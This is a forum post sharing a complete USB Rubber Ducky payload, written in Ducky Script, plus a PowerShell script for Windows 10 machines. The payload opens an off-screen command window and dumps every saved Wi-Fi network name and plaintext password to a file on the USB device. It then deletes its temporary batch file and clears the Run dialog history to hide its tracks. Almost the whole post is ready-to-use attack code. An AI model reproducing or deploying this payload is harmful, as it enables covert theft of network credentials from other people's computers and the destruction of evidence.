Get Wifi passwords from Windows 10 - Twin Ducky 2.1
in Classic USB Rubber Ducky
My first script using the Ducky...
Begged, stole and borrowed from other people's code and amended to get to what I wanted. Most of the code is from Darren Kitchen's 15 second password hack, for the bits around how to use Twin Ducky and how to use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise:
* It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY
* It then uses the Select-String cmdlet to get the password for the wireless networks on the target machine
* Saves this (albeit slightly messily) to Output.txt on the Ducky
* Finally gets rid of the TEMP file and history in the run command window
Look forward to comments and anything anyone can suggest to speed this up and make it better.
Cheers
Audie
Ducky Script
REM Author: Audie2180
REM Ducky WIFI credential plain text password report: 1.0
REM Target: Windows 10
REM Firmware: Twin Duck 2.1
REM Description: Runs PowerShell (a.ps1) to get the wifi passwords using Select-String, saves the output to Output.txt on the Ducky, clears up tracks
DELAY 1000
REM ----Open cmd as administrator
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM ----Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM ----Make batch file that waits for SD card to mount.
REM ----Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM ----Continue script
STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt
ENTER
CONTROL z
ENTER
REM --- Close CMD
DELAY 500
ALT F4
DELAY 500
REM ---- Run BAT file
DELAY 1000
GUI r
DELAY 500
STRING %TEMP%/DuckyWait.bat
DELAY 500
ENTER
DELAY 800
REM ----Open cmd as administrator
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM --- Clean up, close CMD, delete tmp files, remove command prompt hist
REM --- Cleanup file created
DELAY 500
STRING del /f %TEMP%\DuckyWait.bat
ENTER
REM ----Clear the Run history and exit
DELAY 500
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
REM --- Close CMD
DELAY 500
ALT F4
DELAY 500
REM ---- Flash CAPSLOCK
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file...
a.ps1
# Make a list with all WiFi SSIDs and passwords stored locally on Windows OS.
$output = netsh.exe wlan show profiles
$profileRows = $output | Select-String -Pattern 'All User Profile'
$profileNames = New-Object System.Collections.ArrayList
# For each profile name get the SSID and password
for($i = 0; $i -lt $profileRows.Count; $i++){
    $profileName = ($profileRows[$i] -split ":")[-1].Trim()
    $profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear
    $SSIDSearchResult = $profileOutput | Select-String -Pattern 'SSID Name'
    $profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'
    $passwordSearchResult = $profileOutput | Select-String -Pattern 'Key Content'
    if($passwordSearchResult){
        $profilePw = ($passwordSearchResult -split ":")[-1].Trim()
    } else {
        $profilePw = ''
    }
    $networkObject = New-Object -TypeName psobject -Property @{
        ProfileName = $profileName
        SSID = $profileSSID
        Password = $profilePw
    }
    # [void] stops ArrayList.Add from emitting the new index into the output stream
    [void]$profileNames.Add($networkObject)
}
$profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password